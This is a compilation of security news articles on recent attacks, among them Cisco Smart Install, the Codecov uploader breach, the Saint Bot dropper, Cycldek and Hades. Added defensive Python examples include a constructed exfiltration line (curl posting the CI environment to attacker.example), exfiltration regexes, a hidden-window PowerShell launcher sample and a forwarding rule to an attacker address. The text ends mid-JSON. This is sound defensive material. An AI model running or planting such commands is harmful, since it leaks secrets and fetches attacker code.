
Cisco Smart Install Protocol is Still Being Exploited in Cyber-Attacks

 

Five years after Cisco issued its first warning, the Smart Install protocol is still being used in attacks, and roughly 18,000 internet-exposed devices remain that could be targeted. Smart Install is a plug-and-play configuration and image-management feature that lets new Cisco switches be deployed with zero touch. It can be very useful to organizations, but it can also be a significant security liability.

A Smart Install network consists of a group of networking devices, known as clients, served by a common Layer 3 switch or router that acts as the director. The zero-touch installation process lets new access-layer switches be brought up without intervention from a network administrator: the director is the central management point for client switch images and configuration, and when a new client switch joins the network the director recognizes it and determines which Cisco IOS image and configuration file it should download.

The feature stays enabled once a device has been set up through Smart Install, and the protocol (TCP port 4786) carries no authentication. Attackers have used it to remotely reload devices, load a new operating system image, and run arbitrary commands with elevated privileges. Cisco's guidance is that devices which are not actively being provisioned by a director should have the feature turned off with the "no vstack" command (confirm with "show vstack config"), and that TCP port 4786 should be blocked at the network edge.
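A quick way to find devices that expose the protocol on your own address space, as an added example that is not Cisco's or Shadowserver's code: the Python below attempts a TCP connection to port 4786 and reports the hosts that accept it. It is deliberately coarse (it does not speak the Smart Install protocol, so an open port is a lead to confirm with "show vstack config" on the device, not proof). The local listener at the bottom is a constructed stand-in for an exposed device so the example runs offline.

```python
import socket
import threading

SMI_PORT = 4786  # TCP port the Smart Install director/client protocol listens on


def smi_port_open(host, port=SMI_PORT, timeout=3.0):
    """Return True if a TCP connection to host:port is accepted.

    Coarse exposure check only: it does not speak the Smart Install protocol, so an
    open port is a lead to confirm on the device, not proof that SMI is listening."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, or timed out
        return False


def scan(hosts, port=SMI_PORT, timeout=3.0):
    """Return the subset of hosts on which the port accepts connections."""
    return [h for h in hosts if smi_port_open(h, port, timeout)]


# --- constructed local stand-in for an exposed device, so the example runs offline ---
def start_fake_listener():
    """Listen on 127.0.0.1 at an ephemeral port; returns (port, server_socket)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:  # listener shut down
                break

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1], srv


def stop_fake_listener(srv):
    """Stop accepting (shutdown wakes the accept loop) and release the port."""
    try:
        srv.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    srv.close()


def unused_port():
    """Pick a loopback port that is currently not listening."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    port, srv = start_fake_listener()
    print("hosts accepting connections on the test port:", scan(["127.0.0.1"], port))
    stop_fake_listener(srv)
    print("port that is not listening:", smi_port_open("127.0.0.1", unused_port()))
```

Against real targets, replace the host list with your switch management addresses and leave the port at 4786; treat every hit as a device to log into and disable with "no vstack" unless it is deliberately being provisioned.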

Cisco first warned about misuse of Smart Install in 2016, after an exploitation tool was made public. The company issued further alerts in 2017 and 2018, identifying hundreds of thousands of vulnerable devices, including some in critical infrastructure organizations. In 2018 it emerged that hacktivists had targeted the Smart Install feature in attacks on Cisco switches in Iran and Russia as part of an ostensibly pro-US operation, and that a state-sponsored cyberespionage group linked to Russia had abused it as well.

In 2016 the number of networking devices vulnerable to Smart Install attacks exceeded 250,000; by 2018 it had fallen to 168,000. The Shadowserver Foundation still tracks the number of potentially vulnerable devices and reports that almost 18,000 are currently online, many of them in North America, South Korea, the United Kingdom, India, and Russia.

Last month, Lumen Technologies' Black Lotus Labs cybersecurity unit discovered that a hacktivist group had compromised at least 100 internet-exposed routers belonging to both public and private sector entities, most of which were based in the United States.

The Code-Testing Company Codecov Suffers a Data Breach Which Went Undetected for Months

 

U.S. federal authorities are investigating a security breach at Codecov, which sells a tool that lets developers measure how much of their codebase is covered by tests and which serves more than 29,000 customers worldwide. The company acknowledged the breach and said it had gone unnoticed for months.

The breach affected an undisclosed number of customers, including Atlassian, Procter & Gamble, GoDaddy, and the Washington Post. Specifically, the attackers exploited an error in how Codecov built its Docker images to obtain the credential needed to modify the Bash Uploader script, and altered the script to collect details of customers' development and continuous integration environments and report them to a server outside Codecov. After the tampering was discovered on April 1, 2021, a follow-up investigation found that the threat actor had been modifying the script since at least January 31. Three further uploaders built on the Bash Uploader were also affected: the Codecov CircleCI Orb, the Codecov-actions uploader for GitHub, and the Codecov Bitrise Step.

On the Codecov website, CEO Jerrod Engelberg explained in a security update that the attackers' unauthorized access to the Bash Uploader script could have exposed any credentials, tokens, or keys passed through customers' continuous integration environments, along with any services, datastores, and application code reachable with those credentials, and that the modified script sent this information to a third-party server outside Codecov's infrastructure. The potential for downstream effects on Codecov users is high, but the actual damage will depend on several factors: the identity and motives of the actor, how Codecov structured its network, and the protocols, configurations, and access policies each customer applies to its own build environment.
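The practical control against this class of tampering is never to execute a script fetched at build time without first checking it against a digest you reviewed. The Python below, an added example rather than Codecov's own tooling, shows that gate: it pins the SHA-256 of a known-good script and refuses a modified copy, and as a second opinion scans the script for lines that dump the environment to the network. Both scripts, the host names and the pinned digest are constructed for the example; the tampered line mimics the class of change described above, not the actual one.

```python
import hashlib
import re

# Constructed sample: a benign uploader stub and a tampered copy. The added line
# imitates the class of change described in the incident (CI environment dumped and
# posted to an outside host); attacker.example is a placeholder, not a real indicator.
CLEAN_SCRIPT = b"""#!/usr/bin/env bash
set -e
echo "uploading coverage report"
curl -X POST --data-binary @coverage.xml "https://codecov.example/upload"
"""
TAMPERED_SCRIPT = CLEAN_SCRIPT + b"""curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://attacker.example/upload/v2 || true
"""

# Digest of the script you reviewed. In practice take it from the vendor's published
# checksum file, verify that file's signature, and store the value in your own repo
# so a silent change to the download cannot also change the expected digest.
PINNED_SHA256 = hashlib.sha256(CLEAN_SCRIPT).hexdigest()


def sha256_matches(script, pinned):
    return hashlib.sha256(script).hexdigest() == pinned


# Lines that move environment or credential material out of the build. Assumption:
# a small practical set, not a complete signature list.
EXFIL_PATTERNS = [
    re.compile(rb"\$\(\s*env\s*\)"),                  # whole environment expanded
    re.compile(rb"\bprintenv\b"),
    re.compile(rb"\bcurl\b[^\n]*\$\(\s*env\s*\)"),    # environment handed to curl
    re.compile(rb"\bcurl\b[^\n]*\bhttp://"),          # plaintext upload from a CI script
]


def suspicious_lines(script):
    """Return (line_number, line_text) for every line matching an exfil pattern."""
    hits = []
    for number, line in enumerate(script.splitlines(), 1):
        if any(p.search(line) for p in EXFIL_PATTERNS):
            hits.append((number, line.decode(errors="replace")))
    return hits


def safe_to_run(script, pinned):
    """Gate execution: the digest must match AND nothing may look like exfiltration.
    The digest is the real control; the scan also catches the case where someone
    updated the pinned hash without reviewing what changed."""
    return sha256_matches(script, pinned) and not suspicious_lines(script)


if __name__ == "__main__":
    print("clean script allowed:", safe_to_run(CLEAN_SCRIPT, PINNED_SHA256))
    print("tampered script allowed:", safe_to_run(TAMPERED_SCRIPT, PINNED_SHA256))
    for number, line in suspicious_lines(TAMPERED_SCRIPT):
        print(f"line {number}: {line}")
```

In a pipeline the equivalent is to download the uploader to a file, compare its digest with the pinned value, and only then pass it to the shell; a script piped straight from curl into bash is exactly what made the altered uploader run unnoticed for two months.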

Codecov is not a publicly traded company; it employs a few dozen people and measures its annual revenue in the low millions of dollars. Despite the high profile of some of its clients, it has attracted little attention since its founding in 2014, which suggests the threat actor did a good deal of research before choosing it as a target.

How well Codecov's network was segmented may also partly determine which customer data the threat actors were able to reach. Developers should not be allowed to pull open-source code directly from the internet and use it unchecked, either. "It seems like every time I hire a new developer, that's the first thing they do with the code they write, so we have to put automated checks in there so the moment somebody tries to do that, they get caught and it stops," said Zanni.

Many observers cited robust code-signing policies as standard practice. The breach reflected the "huge ROI for attackers to attack the supply chain," said John Loucaides, Vice President of Research and Development at a vulnerability research firm, who added that any alteration to code must be vetted by other parties before approval.

Bambenek says that although the attackers went completely unnoticed for months, detecting and disclosing a small change to a script within three months is impressive for a small company with limited resources like Codecov. He contrasted it with SolarWinds, where significant changes to the Orion build platform went unnoticed for at least a year, if not longer, both by the company itself and by a multitude of customers and federal agencies with far larger budgets.

“Codecov maintains a variety of information security policies, procedures, practices, and controls. We continually monitor our network and systems for unusual activity, but Codecov, like any other company, is not immune to this type of event,” Engelberg stated in the regard. “We regret any inconvenience this may cause and are committed to minimizing any potential impact on you, our users, and customers.”

New Malware Downloader Spotted in Targeted Campaigns

 

In recent weeks a relatively sophisticated new malware downloader has emerged which, while not yet widely distributed, appears to be gaining momentum. Malwarebytes researchers recently found the Saint Bot dropper, as they have named it, used as part of the infection chain in targeted campaigns against government institutions in Georgia.

Researchers found Saint Bot while investigating a phishing email carrying a zip archive that contained malware they had not seen before. The archive held an obfuscated PowerShell script disguised as a link to a Bitcoin wallet; according to Malwarebytes, running it started a chain of infections that ended with Saint Bot being dropped on the compromised system.
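The infection chain begins with an archive attachment carrying a script, which is something a mail gateway or a triage script can flag before a user opens it. As an added example (not Malwarebytes' code, and with a constructed sample rather than a real Saint Bot archive), the Python below builds a zip in memory holding a PowerShell launcher named to look like a wallet link, lists archive members with executable or script extensions, and reports the obfuscation markers found in them. The marker list is an assumption, a practical rather than exhaustive set.

```python
import io
import re
import zipfile

# Attachment members that should never arrive unexpectedly from outside.
RISKY_EXTS = {".ps1", ".vbs", ".js", ".jse", ".bat", ".cmd", ".hta", ".lnk", ".scr", ".exe"}
TEXT_SCRIPT_EXTS = {".ps1", ".vbs", ".js", ".jse", ".bat", ".cmd", ".hta"}

# Markers common in obfuscated PowerShell launchers. Assumption: a practical,
# not exhaustive, list chosen for this example.
PS_MARKERS = {
    "encoded command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I),
    "base64 decode": re.compile(r"FromBase64String", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download primitive": re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "string assembly": re.compile(r"\[char\]\s*\d+|-join\s*\(|\{\d+\}\{\d+\}", re.I),
}


def powershell_indicators(text):
    """Names of the markers present in a script body."""
    return [name for name, pat in PS_MARKERS.items() if pat.search(text)]


def inspect_zip(data):
    """Inspect an in-memory zip; return one finding dict per risky member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            if ext not in RISKY_EXTS:
                continue
            indicators = []
            if ext in TEXT_SCRIPT_EXTS:
                body = zf.read(info).decode("utf-8", errors="replace")
                indicators = powershell_indicators(body)
            findings.append({"member": name, "ext": ext, "indicators": indicators})
    return findings


def build_sample_zip():
    """Constructed sample in the shape described above: a PowerShell launcher whose
    filename suggests a Bitcoin wallet link, plus a harmless decoy. The base64 blob
    is a placeholder, not real malware."""
    launcher = ("powershell -w hidden -nop -ep bypass -enc "
                "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("bitcoin_wallet_link.ps1", launcher)
        zf.writestr("readme.txt", "Your wallet link is attached.")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in inspect_zip(build_sample_zip()):
        print(finding["member"], "->", ", ".join(finding["indicators"]) or "no markers")
```

Shortcut (.lnk) members are flagged by extension only, since their command line lives in a binary format rather than in text; a fuller triage tool would parse the shortcut and feed its arguments through the same marker check.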

In each case the attackers used Saint Bot to drop information stealers and other malware downloaders. According to the vendor, the loader is probably being used by several different threat actors, implying that there are likely other victims.

One information stealer Saint Bot has been observed dropping is Taurus, a tool designed to steal passwords, browser history, cookies, and auto-fill data. Taurus can also steal FTP and email client credentials, as well as system information such as configuration details and installed software. According to Malwarebytes, while Saint Bot has mostly been seen dropping stealers, it is designed to deliver any malware onto a compromised system.

Malware droppers are specialized tools for installing other malware on victim systems. One of the most notable recent examples of such first-stage malware is Sunburst, distributed through poisoned SolarWinds Orion software updates to some 18,000 organizations worldwide; in that case the first stage was designed to deliver follow-on payloads only to organizations of particular interest to the attackers.

In general, downloaders are first-stage malware designed to deliver a wide range of second- and third-stage commodity payloads such as ransomware, banking Trojans, cryptominers, and other malicious tools. Some of the most popular droppers of recent years, including Emotet, Trickbot, and Dridex, began as banking Trojans before their operators switched tactics and turned them into delivery vehicles for other criminals' malware.

Like many other droppers, Saint Bot has several obfuscation and anti-analysis features to help it evade malware-detection tools. It checks for virtual machines and, in some cases, checks the system locale and refuses to run on machines in specific Commonwealth of Independent States countries, the bloc of former Soviet states that includes Russia, Azerbaijan, Armenia, Uzbekistan, Ukraine, and Moldova.

"As we were about to publish on this downloader, we identified a few new campaigns that appear to be politically motivated and where Saint Bot was being used as part of the infection chain. In particular, we observed malicious documents laced with exploits often accompanied by decoy files," a spokesperson for Malwarebytes' threat intelligence team said. In all instances, Saint Bot was eventually used to drop stealers.

According to Malwarebytes, while Saint Bot is not yet a widespread threat, there are indications that its creators are still actively developing it. The vendor's investigation revealed that an earlier version of the tool existed not long ago. "Additionally, we are also seeing new campaigns that appear to be from different customers, which would indicate that the malware author is involved in further customizing the product," a Malwarebytes spokesperson said.

Yanbian Gang Malware Continues With Large-Scale Distribution and C2

 

Fake banking apps laced with malware remain a key factor in the success of threat actors. For the Yanbian Gang, a criminal group based in Yanbian, China, that targets organizations across Asia, it is a skill they have been honing for more than a decade.

Since 2013, the Yanbian Gang has been targeting South Korean Android mobile banking customers with malicious Android apps impersonating major banks, including Shinhan Savings Bank, Saemaul Geumgo, Shinhan Finance, KB Kookmin Bank, and NH Savings Bank. RiskIQ's threat research team examined some of the threat group's most recent activity in this vector to examine their malware of choice as well as the large-scale hosting infrastructure they use to distribute and control it. 

Hundreds of Korean-language apps were discovered across an extensive list of IP addresses during the researchers' analysis of Yanbian Android apps. These apps were built to steal information from infected victims, including loan application details, contacts, SMS messages, phone call details, call logs, and the applications installed on the device.

Since December 2020, RiskIQ's analysis has identified 377 individual samples of malicious Android apps developed and distributed by the Yanbian Gang. Many of these apps have multiple versions and set up services to run in the background of victim phones, both of which fit the Yanbian Gang's known method of operation. 

While these apps appear simple, they can perform a variety of malicious activities without the victim's knowledge. Yanbian Gang actors obtain information not only about the victim but also about their contacts, installed applications, and even messages sent from the infected device. The apps also request a plethora of permissions that can be abused for malicious purposes.

One of the research findings was references to various URL paths leading to a specific IP address over HTTP. The Yanbian Gang refers to these paths as "methods"; together they form the command-and-control (C2) interface, letting the app register the device, report its capabilities, upload stolen information, and receive instructions from the specified C2 servers.

RiskIQ researchers observed one sample using only some of these "methods," most likely because of the limited data on their test device and its lack of features. The communications were sent to the C2 server as encrypted HTTP POST and GET requests.

The Yanbian Gang continues to target South Korean users with malware, tactics, and targeting similar to what was reported in 2015. The group has, however, evolved to separate its infrastructure by function and to switch hosting providers. According to RiskIQ, it actively operates web servers hosting its call-to-action pages and malicious application delivery, C2 servers, and servers running the Real-Time Messaging Protocol (RTMP) that receive call information.

Active Cyber Attacks on Mission-Critical SAP Apps

 

Security researchers are warning about the arrival of attacks targeting SAP enterprise applications that have not been updated to address vulnerabilities for which patches are available, or that utilize accounts with weak or default passwords. 

Over 400,000 organizations worldwide and 92% of Forbes Global 2000 use SAP's enterprise apps for supply chain management, enterprise resource planning, product lifecycle management, and customer relationship management.

According to a study released jointly by SAP and Onapsis, threat actors launched at least 300 successful attacks on unprotected SAP instances beginning in mid-2020. Six vulnerabilities have been exploited, some of which grant complete control over unprotected applications. Although SAP had released fixes for all of them, the targeted companies had not installed them or were running SAP with insecure user accounts.

"We're releasing the research Onapsis has shared with SAP as part of our commitment to help our customers ensure their mission-critical applications are protected," Tim McKnight, SAP Chief Security Officer, said. 

"This includes applying available patches, thoroughly reviewing the security configuration of their SAP environments, and proactively assessing them for signs of compromise." The six flaws, once exploited, can also be used for lateral movement across the business network to compromise other systems.

The threat actors behind these attacks have exploited multiple security vulnerabilities and insecure configurations in SAP applications in attempts to breach the targets' systems. In addition, some of them have also been observed while chaining several vulnerabilities in their attacks to "maximize impact and potential damage."

According to an alert issued by CISA, organizations affected by these attacks could suffer theft of sensitive data, financial fraud, disruption of mission-critical business processes, ransomware, and a halt of all operations.

Patching vulnerable SAP systems should be a priority for all defenders: Onapsis found that attackers begin targeting critical SAP vulnerabilities within 72 hours of their disclosure, and that exposed, unpatched SAP applications were compromised in under three hours.

Both SAP and Onapsis recommend that organizations protect themselves by immediately performing a compromise assessment on SAP applications still exposed to the targeted flaws, prioritizing internet-facing ones.

Companies should also assess all applications in their SAP environment for risk as soon as possible, apply the relevant SAP security patches and secure configurations, and review SAP applications for misconfigured high-privilege user accounts.

"The critical findings noted in our report describe attacks on vulnerabilities with patches and secure configuration guidelines available for months and even years," said Onapsis CEO Mariano Nunez.

"Companies that have not prioritized rapid mitigation for these known risks should consider their systems compromised and take immediate and appropriate action," Nunez added.

The Less Advanced but Consistent Cycldek Threat Actors

 

It is fairly common for tools and methodologies to be shared across the nebula of Chinese-speaking threat actors, and the infamous "DLL side-loading triad" is one example. DLL side-loading is a highly effective technique that abuses the way Windows applications locate and load dynamic link libraries: a legitimate signed executable, a malicious DLL carrying the name of a library the executable expects, and an encrypted payload are usually dropped together by a self-extracting archive. Initially regarded as a LuckyMouse signature, the same "triad" was later observed in use by other groups such as HoneyMyte. This means an attack cannot be attributed on the basis of this technique alone, but detecting such triads efficiently exposes a growing share of malicious activity.

Researchers have identified a malware sample known as the FoundCore loader, configured to attack high-profile organizations in Vietnam. At a high level, the infection chain starts with FINDER.exe, a legitimate Microsoft Outlook component, which side-loads outlib.dll, a malicious loader that hijacks the program's execution flow and then decrypts and runs shellcode stored in a companion file named rdmin.src.
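Because the triad places a DLL next to a legitimate signed executable, the load event itself is the detection opportunity. The Python below is an added example, not Kaspersky's tooling: it scores image-load events for the signs of side-loading (a signed host loading an unsigned DLL, a DLL in the host's own directory carrying a different signer, a well-known Windows DLL name loaded from outside the Windows directory). The event shape is loosely modelled on a Sysmon Event ID 7 record; the process-signer fields and the list of commonly abused DLL names are assumptions added for the example, and every event is a constructed sample.

```python
import ntpath
from dataclasses import dataclass


@dataclass
class ImageLoad:
    """One image-load event. Loosely follows a Sysmon Event ID 7 (Image loaded)
    record; the process signer fields are an assumption added for this example."""
    process_image: str
    process_signed: bool
    process_signer: str
    loaded_image: str
    dll_signed: bool
    dll_signer: str


# DLL names often used as side-load bait because many signed hosts import them and
# expect Windows to supply them from System32. Assumption: illustrative, not complete.
COMMON_BAIT_DLLS = {"version.dll", "wtsapi32.dll", "dbghelp.dll", "cryptbase.dll", "uxtheme.dll"}


def in_windows_dir(path):
    return path.lower().startswith("c:\\windows\\")


def sideload_reasons(ev):
    """Reasons this load looks like side-loading; an empty list means benign."""
    reasons = []
    same_dir = ntpath.dirname(ev.process_image).lower() == ntpath.dirname(ev.loaded_image).lower()
    dll_name = ntpath.basename(ev.loaded_image).lower()
    if ev.process_signed and not ev.dll_signed:
        reasons.append("signed host loaded an unsigned DLL")
    if same_dir and not in_windows_dir(ev.loaded_image) \
            and ev.dll_signer.lower() != ev.process_signer.lower():
        reasons.append("DLL in the host's own directory is not signed by the host's publisher")
    if dll_name in COMMON_BAIT_DLLS and not in_windows_dir(ev.loaded_image):
        reasons.append(f"{dll_name} shadows a Windows DLL from a non-Windows path")
    return reasons


def triage(events):
    """Score events; return (reason_count, process, dll, reasons) tuples, worst first."""
    scored = []
    for ev in events:
        reasons = sideload_reasons(ev)
        if reasons:
            scored.append((len(reasons), ev.process_image, ev.loaded_image, reasons))
    return sorted(scored, key=lambda t: -t[0])


# Constructed sample events.
SAMPLE_EVENTS = [
    # normal Office start-up: signed host, Windows DLL served from System32
    ImageLoad(r"C:\Program Files\Microsoft Office\root\Office16\FINDER.exe", True, "Microsoft Corporation",
              r"C:\Windows\System32\version.dll", True, "Microsoft Windows"),
    # a legitimate application loading its own signed DLL from its own directory
    ImageLoad(r"C:\Program Files\Vendor\app.exe", True, "Vendor Ltd",
              r"C:\Program Files\Vendor\helper.dll", True, "Vendor Ltd"),
    # the triad: signed FINDER.exe copied to a user-writable directory loads an unsigned outlib.dll beside it
    ImageLoad(r"C:\Users\victim\AppData\Local\Temp\FINDER.exe", True, "Microsoft Corporation",
              r"C:\Users\victim\AppData\Local\Temp\outlib.dll", False, ""),
    # a bait DLL name dropped next to a signed host
    ImageLoad(r"C:\Users\victim\Downloads\tool.exe", True, "Some Vendor",
              r"C:\Users\victim\Downloads\version.dll", False, ""),
]


if __name__ == "__main__":
    for count, process, dll, reasons in triage(SAMPLE_EVENTS):
        print(f"[{count}] {process} -> {dll}")
        for r in reasons:
            print("     ", r)
```

The second rule is what keeps legitimate software quiet: applications routinely load their own DLLs from their install directory, so the directory alone is not a signal, but a DLL there whose signer differs from the host's (or that is unsigned) is.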

The final payload, FoundCore, is a remote access tool that gives its operators complete control of the victim machine. On execution it starts four threads. The first establishes persistence by creating a service. The second obscures that service by rewriting its registry fields, such as Description, ImagePath and DisplayName. The third sets an empty DACL (the "D:P" SDDL string) on the current process, so that ordinary access to the process object is denied and inspection by tools that do not hold debug privileges is hampered. Finally, a worker thread bootstraps execution and connects to the C2 server; depending on its configuration, it can also inject a copy of itself into another process. The malware supports a range of commands to manipulate the filesystem, manipulate processes, execute arbitrary commands, and capture screenshots. DropPhone and CoreLoader are other malware families delivered during the attacks.

Cycldek, active since 2013 and also known as Goblin Panda and Conimes, is known for targeted delivery and a preference for Vietnamese targets and governments in Southeast Asia. A June 2020 report described a custom piece of malware used to exfiltrate data from air-gapped systems, a clear sign of evolution for a group previously considered less sophisticated. According to Kaspersky, the more recent attacks show even more sophistication.

In the attack on a high-profile Vietnamese organization, a legitimate Microsoft Outlook component was abused to load a DLL that ran shellcode acting as the loader for the FoundCore RAT. While Cycldek has been regarded as one of the less advanced threat actors in the Chinese-speaking world, the campaign shows that its targeting remains consistent.

Hades Ransomware Attacks US Big Game

 

A little-known, financially motivated threat group is using the self-proclaimed Hades ransomware in cybercrime operations that have affected at least three victims since December 2020. Known victims include a large US transportation and logistics company, a large US consumer products company, and a global manufacturing organization.

The tactics, techniques, and procedures (TTPs) used to compromise a victim network, escalate privileges, move laterally, evade defenses, exfiltrate data, and deploy Hades are broadly consistent with those of other notable ransomware operators, combining commodity tooling with living-off-the-land techniques. When Hades lands on a victim machine it copies itself and relaunches the copy from the command line; the "spare" copy is then deleted and an executable is unpacked in memory. It then scans local directories and network shares for content to encrypt. Each Hades sample obtained uses a different file extension for encrypted files.

Accenture also identified additional Tor hidden services and clearnet URLs through open-source reporting on Hades samples. For every sample examined, the ransom note instructs the victim to install the Tor browser and visit a specified page. The Tor pages differ only in the victim ID they present, indicating that each address may be generated per victim. Accenture Security identified a total of six such addresses, suggesting there could be three further victims it is not yet aware of.

It is currently unclear whether the group operates under an affiliate model or whether Hades is distributed by a single group. Under an affiliate model, developers partner with affiliates who take on different tasks or phases of the operation lifecycle, such as delivering the malware, providing initial access to organizations, or even target selection and reconnaissance. In any case, intrusion data from incident response engagements shows the operators tailoring their tactics and tooling to deliberately chosen targets and running a more "hands-on-keyboard" operation to inflict maximum damage and extract higher payouts.

Accenture also noted similarities between the Hades ransom notes and those used by REvil ransomware operators, with parts of the notes containing identical wording.

Serious Vulnerabilities Discovered in Group FaceTime and Similar Calling Apps

 

Vulnerabilities in the Google Duo, Facebook Messenger, Signal, JioChat, and Mocha messaging apps could have let a caller listen in on a target's surroundings without consent, before the person on the other end had answered the call.

Natalie Silvanovich, a security researcher with Google's Project Zero, found the bugs while examining several video-calling mobile applications; all of them have now been fixed. The research was prompted by a similar flaw in Apple's Group FaceTime in January 2019, when iPhones, renowned for their security features, were found to have a critical eavesdropping bug.

The Group FaceTime vulnerability allowed a caller to start a FaceTime video call and eavesdrop on the target: by adding their own number as a third participant to the group call before the recipient picked up, the caller could hear audio from the target's phone. The flaw was serious enough that Apple temporarily disabled the Group FaceTime feature; the issue was later resolved in an iOS update.

Natalie Silvanovich stated that “I investigated the signalling state machines of seven video conferencing applications and found five vulnerabilities that could allow a caller device to force a callee device to transmit audio or video data. Theoretically, ensuring callee consent before audio or video transmission should be a fairly simple matter of waiting until the user accepts the call before adding any tracks to the application”. 

“However, when I looked at real applications, they enabled transmission in many different ways. Most of these led to vulnerabilities that allowed calls to be connected without interaction from the callee,” she added.

The Google Duo bug, a race condition that let callees leak video packets from unanswered calls to the caller, was patched in December 2020. Two related vulnerabilities were found in the Mocha and JioChat messengers in July 2020: the JioChat bug, which allowed audio to be sent before the call was answered, was patched in July 2020, and the Mocha audio and video bugs were patched in August 2020.
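The point in the quote above, that media should only be attached once the callee has accepted, can be made concrete with a small callee-side signalling state machine. The Python below is an added example and not the code of any of the applications named: it models one vulnerable behaviour in the class described (enabling transmission as soon as the caller's add-track message arrives) beside the fixed behaviour (queueing tracks until accept()), and shows what a caller who hangs up before the answer would have received in each case. The message names are assumptions chosen for the example.

```python
from enum import Enum, auto


class State(Enum):
    IDLE = auto()
    RINGING = auto()    # offer received, callee has not answered
    CONNECTED = auto()  # callee accepted
    ENDED = auto()


class CalleeSession:
    """Callee-side signalling state. gate_on_accept=False reproduces the bug class
    described above (a caller-driven add-track message enables transmission while
    the call is still ringing); gate_on_accept=True is the fix (tracks are queued
    and only attached after accept())."""

    def __init__(self, gate_on_accept=True):
        self.state = State.IDLE
        self.gate_on_accept = gate_on_accept
        self.sending = []         # media tracks currently transmitted to the caller
        self.pending_tracks = []  # tracks requested before the user answered
        self.caller = None

    def on_offer(self, caller_id):
        if self.state is not State.IDLE:
            raise RuntimeError("offer received in state %s" % self.state.name)
        self.caller = caller_id
        self.state = State.RINGING

    def on_add_track(self, kind):
        """Caller-driven request to add a local track ('audio' or 'video').
        Returns True if the request was processed at all."""
        if self.state not in (State.RINGING, State.CONNECTED):
            return False
        if self.state is State.CONNECTED or not self.gate_on_accept:
            self.sending.append(kind)          # vulnerable path when still ringing
        else:
            self.pending_tracks.append(kind)   # remembered, nothing transmitted
        return True

    def accept(self):
        """User consent: only now do queued tracks start transmitting."""
        if self.state is not State.RINGING:
            raise RuntimeError("accept in state %s" % self.state.name)
        self.state = State.CONNECTED
        self.sending.extend(self.pending_tracks)
        self.pending_tracks.clear()

    def hangup(self):
        self.state = State.ENDED
        self.sending.clear()
        self.pending_tracks.clear()


def leaked_before_answer(gate_on_accept):
    """Simulate a caller that sends an offer and add-track messages, then hangs up
    before the callee answers; return the tracks that were transmitted meanwhile."""
    s = CalleeSession(gate_on_accept)
    s.on_offer("caller")
    s.on_add_track("audio")
    s.on_add_track("video")
    leaked = list(s.sending)
    s.hangup()
    return leaked


def tracks_after_accept():
    """Fixed session: a track requested while ringing is sent only after accept()."""
    s = CalleeSession(gate_on_accept=True)
    s.on_offer("caller")
    s.on_add_track("audio")
    before = list(s.sending)
    s.accept()
    return before, list(s.sending)


if __name__ == "__main__":
    print("vulnerable: leaked before answer ->", leaked_before_answer(False))
    print("fixed:      leaked before answer ->", leaked_before_answer(True))
    print("fixed:      before/after accept  ->", tracks_after_accept())
```

The fix is a property of the state machine, not of any one message handler: every path that can attach a track (offer handling, renegotiation, an add-track request) has to consult the same "has the user accepted" state, which is why the quote notes that applications enabling transmission "in many different ways" ended up with vulnerable paths.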

Threat Actors Bypassed MFA to Gain Access to Cloud Service Accounts

 

The United States Cybersecurity and Infrastructure Security Agency (CISA) has warned organizations that attackers are bypassing multi-factor authentication (MFA) to gain access to cloud service accounts.

Attackers often attempt logins with stolen username and password combinations, which usually fail when an organization has MFA enabled. CISA said that in at least one instance the threat actors nevertheless gained access to a user's account despite MFA being enabled, possibly by using stolen browser cookies, a technique known as "pass-the-cookie".

With stolen session cookies, an attacker can take over an already-authenticated session with a web application or online service without needing the password or a second factor. CISA also observed the attackers abusing email forwarding rules that users had set up to copy mail to their personal accounts.

CISA stated in the report that “in one case, we determined that the threat actors modified an existing email rule on a user’s account, originally set by the user to forward emails sent from a certain sender to a personal account, to redirect the emails to an account controlled by the actors. The threat actors updated the rule to forward all email to the threat actors’ accounts”.

The threat actors also created new mailbox rules that moved specific messages, those containing certain phishing-related keywords, into the user's RSS Feeds or RSS Subscriptions folders, so that security warnings would not be seen by the user. CISA clarified that this activity is not linked to the SolarWinds supply chain attack.
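Both rule abuses described above, external forwarding and hiding keyword-matched mail in an unwatched folder, can be found by auditing every mailbox's inbox rules. The Python below is an added example, not CISA's tooling: it takes a JSON export of rules (field names follow those an Exchange Online Get-InboxRule dump carries; the mailboxes, addresses and rules are constructed samples) and reports rules that forward outside the organisation, move security-related mail into RSS or other unwatched folders, or have an empty or one-character name. Run against a real export, the same logic also catches the modified forwarding rule in CISA's case, since the new target is external.

```python
import json

# Constructed export of inbox rules. Field names follow those an Exchange Online
# Get-InboxRule dump carries (Name, Enabled, ForwardTo, RedirectTo, MoveToFolder,
# SubjectContainsWords, DeleteMessage); mailboxes, addresses and rules are samples.
RULES_JSON = """[
 {"Mailbox": "alice@corp.example", "Name": "Vendor invoices", "Enabled": true,
  "ForwardTo": ["drop@attacker.example"], "RedirectTo": [], "MoveToFolder": "",
  "SubjectContainsWords": [], "DeleteMessage": false},
 {"Mailbox": "bob@corp.example", "Name": ".", "Enabled": true,
  "ForwardTo": [], "RedirectTo": [], "MoveToFolder": "RSS Subscriptions",
  "SubjectContainsWords": ["phishing", "suspicious", "hacked", "password"], "DeleteMessage": false},
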